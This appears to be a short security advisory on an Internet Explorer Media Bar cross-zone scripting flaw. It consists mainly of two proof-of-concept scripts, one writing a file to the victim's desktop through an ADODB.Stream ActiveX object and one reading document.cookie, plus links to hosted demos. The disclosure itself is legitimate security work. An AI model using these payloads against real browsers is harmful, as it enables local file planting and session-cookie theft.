|
Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
The following proof of concept has been supplied: <script> // '\\42' -> '\42' -> ' " ' img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);' + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);' + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);'; inject_html="<img src='" + img_src + "'>"; window.open('file:javascript:document.write("' + inject_html + '")','_media'); </script> Additional proof of concept for cross site scripting has been supplied as well: <script> window.open("http://www.google.com/","_media") setTimeout(function(){ window.open("file:javascript:alert(document.cookie);","_media") },5000); </script> Proof-of-concept demos are available at the following locations: http://www.freewebs.com/applesoup/CrossMediaBar/demo.html http://www.freewebs.com/applesoup/CrossMediaBar/CrossSite.htm The original proof-of-concept is available at the following location: http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm |
|
|
Privacy Statement |
